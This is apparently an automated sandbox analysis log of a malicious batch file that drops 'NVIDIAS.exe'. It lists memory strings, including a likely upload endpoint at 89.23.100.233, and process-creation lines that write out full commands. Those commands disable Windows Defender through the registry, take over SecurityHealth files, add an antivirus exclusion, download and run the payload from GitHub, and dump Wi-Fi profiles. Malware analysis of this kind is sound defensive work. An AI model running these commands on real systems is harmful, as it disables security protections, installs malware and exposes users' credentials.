Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.233:1490 |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.233:1490/uploadt |
Source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070701000.00000020.00000001.01000000.00000008.sdmp | String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp |
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: svchost.exe, 0000001F.00000002.2120814233.0000020FFFE43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver) |
Source: edb.log.31.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/ |
Source: qmgr.db.31.dr | String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93 |
Source: qmgr.db.31.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457 |
Source: qmgr.db.31.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook |
Source: qmgr.db.31.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle |
Source: qmgr.db.31.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: qmgr.db.31.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7. |
Source: qmgr.db.31.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/ |
Source: qmgr.db.31.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383 |
Source: Amcache.hve.39.dr | String found in binary or memory: http://upx.sf.net |
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: edb.log.31.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
Source: tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://gemini.google.com/app?q= |
Source: 3gJQoqWpxb.bat | String found in binary or memory: https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe |
Source: tmp44F5.tmp.dat.21.dr | String found in binary or memory: https://login.live.com/ |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr | String found in binary or memory: https://login.live.com// |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr | String found in binary or memory: https://login.live.com/https://login.live.com/ |
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr | String found in binary or memory: https://login.live.com/v104 |
Source: qmgr.db.31.dr | String found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC: |
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico |
Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033AB258 | 21_2_033AB258 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033AD800 | 21_2_033AD800 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A1098 | 21_2_033A1098 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A96D0 | 21_2_033A96D0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033ABED0 | 21_2_033ABED0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A8D08 | 21_2_033A8D08 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9368 | 21_2_033A9368 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9358 | 21_2_033A9358 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A0A70 | 21_2_033A0A70 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033AB980 | 21_2_033AB980 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A1089 | 21_2_033A1089 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9F88 | 21_2_033A9F88 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9E38 | 21_2_033A9E38 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9E28 | 21_2_033A9E28 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A9621 | 21_2_033A9621 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_033A8CFA | 21_2_033A8CFA |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03531B10 | 21_2_03531B10 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0353C978 | 21_2_0353C978 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03533180 | 21_2_03533180 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0353E061 | 21_2_0353E061 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03538778 | 21_2_03538778 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03534FC0 | 21_2_03534FC0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03530648 | 21_2_03530648 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03532DF1 | 21_2_03532DF1 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03535C90 | 21_2_03535C90 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0353F4AB | 21_2_0353F4AB |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03538A20 | 21_2_03538A20 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_035332E0 | 21_2_035332E0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0353C95D | 21_2_0353C95D |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03533171 | 21_2_03533171 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03535070 | 21_2_03535070 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03534810 | 21_2_03534810 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0353F4AB | 21_2_0353F4AB |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_035317B0 | 21_2_035317B0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03530638 | 21_2_03530638 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03537C70 | 21_2_03537C70 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03537C60 | 21_2_03537C60 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_03536C90 | 21_2_03536C90 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D431C0 | 21_2_05D431C0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D46140 | 21_2_05D46140 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D4A4D0 | 21_2_05D4A4D0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D4A0D0 | 21_2_05D4A0D0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D42C80 | 21_2_05D42C80 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D42068 | 21_2_05D42068 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D4F030 | 21_2_05D4F030 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D4AC20 | 21_2_05D4AC20 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D437E0 | 21_2_05D437E0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D497E8 | 21_2_05D497E8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D423B0 | 21_2_05D423B0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D44B38 | 21_2_05D44B38 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D455C8 | 21_2_05D455C8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D439B0 | 21_2_05D439B0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D489B8 | 21_2_05D489B8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D437D1 | 21_2_05D437D1 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D497D8 | 21_2_05D497D8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D4A700 | 21_2_05D4A700 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D46140 | 21_2_05D46140 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D43A17 | 21_2_05D43A17 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_05D43A30 | 21_2_05D43A30 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731F730 | 21_2_0731F730 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07315740 | 21_2_07315740 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731A7B2 | 21_2_0731A7B2 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07312BA3 | 21_2_07312BA3 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07312788 | 21_2_07312788 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731DBC1 | 21_2_0731DBC1 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07319238 | 21_2_07319238 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07312278 | 21_2_07312278 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07313668 | 21_2_07313668 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_073146B0 | 21_2_073146B0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07314E98 | 21_2_07314E98 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731C689 | 21_2_0731C689 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731C2EE | 21_2_0731C2EE |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731F6C0 | 21_2_0731F6C0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731E178 | 21_2_0731E178 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731D868 | 21_2_0731D868 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07310040 | 21_2_07310040 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731F0A0 | 21_2_0731F0A0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_073124A8 | 21_2_073124A8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07310B67 | 21_2_07310B67 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731F768 | 21_2_0731F768 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07314340 | 21_2_07314340 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07313E61 | 21_2_07313E61 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07319298 | 21_2_07319298 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731D851 | 21_2_0731D851 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0731F05F | 21_2_0731F05F |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07641468 | 21_2_07641468 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07641D70 | 21_2_07641D70 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07643F70 | 21_2_07643F70 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07648A78 | 21_2_07648A78 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07640040 | 21_2_07640040 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07642F48 | 21_2_07642F48 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0764F921 | 21_2_0764F921 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07643500 | 21_2_07643500 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07647508 | 21_2_07647508 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07643A19 | 21_2_07643A19 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_076427C9 | 21_2_076427C9 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_076459A8 | 21_2_076459A8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07645161 | 21_2_07645161 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07641451 | 21_2_07641451 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07640720 | 21_2_07640720 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_07640006 | 21_2_07640006 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0764FB18 | 21_2_0764FB18 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0764A7F8 | 21_2_0764A7F8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0764A7AA | 21_2_0764A7AA |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08307020 | 21_2_08307020 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08307C58 | 21_2_08307C58 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08300040 | 21_2_08300040 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083064B9 | 21_2_083064B9 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08306898 | 21_2_08306898 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08303578 | 21_2_08303578 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083065BA | 21_2_083065BA |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08306DA0 | 21_2_08306DA0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083051D8 | 21_2_083051D8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830BE38 | 21_2_0830BE38 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830DE41 | 21_2_0830DE41 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083066FE | 21_2_083066FE |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830CF38 | 21_2_0830CF38 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830DB69 | 21_2_0830DB69 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08308B58 | 21_2_08308B58 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083027C0 | 21_2_083027C0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830B890 | 21_2_0830B890 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830B880 | 21_2_0830B880 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830208A | 21_2_0830208A |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830A4D2 | 21_2_0830A4D2 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08306D9A | 21_2_08306D9A |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830C5F8 | 21_2_0830C5F8 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830C5DD | 21_2_0830C5DD |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083079C0 | 21_2_083079C0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08305A2F | 21_2_08305A2F |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08305E13 | 21_2_08305E13 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830561D | 21_2_0830561D |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08308E7A | 21_2_08308E7A |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_0830775D | 21_2_0830775D |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083027B0 | 21_2_083027B0 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08303790 | 21_2_08303790 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_08307B98 | 21_2_08307B98 |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Code function: 21_2_083093AA | 21_2_083093AA |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command "" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout.exe /t 10 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d | |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All | |
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716 | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak | |
Source: C:\ProgramData\QQQ\NVIDIAS.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320 | |
